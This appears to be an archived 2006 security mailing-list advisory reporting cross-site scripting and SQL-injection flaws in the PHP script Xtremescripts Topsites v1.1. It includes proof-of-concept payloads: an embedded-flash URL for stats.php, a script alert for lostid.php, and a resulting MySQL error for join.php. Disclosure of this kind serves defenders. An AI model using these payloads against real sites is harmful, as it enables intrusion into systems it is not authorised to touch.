|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Xtremescripts Topsites v1.1
luny
youfucktard.com
Date: Fri May 19 2006 - 17:39:43 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Xtremescripts Topsites v1.1
Homepage:
http://www.xtremescripts.com/topsites.php
Description:
Xtreme Topsites is a popular topsite PHP script for websites. Most commonly
used across anime websites at the moment. The topsite will count hits/clicks
in and hits out and will rank them on total hits so that the site with the most
hits will be number 1.
Effected files:
stats.php
join.php
lostid.php
Exploit:
stats.php allows embedded objects which in turn can cause a XSS.
example:
http://www.example.com/xtremets/stats.php?id=1 <embed allowScriptAccess="never"src="harmfulflash.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="
0" height="0"></embed>
lostid.php input data isn't properally sanatized & filtered which allows for XSS
example:
put in box: <script>alert('hi')</script>
Input data on join.php isn't sanatized and can create mysql errors if users input malicious data.
example:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near 'hi'','9cdfb439c7876e703e307864c9167a15','0','19052006','-')' at line 2
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]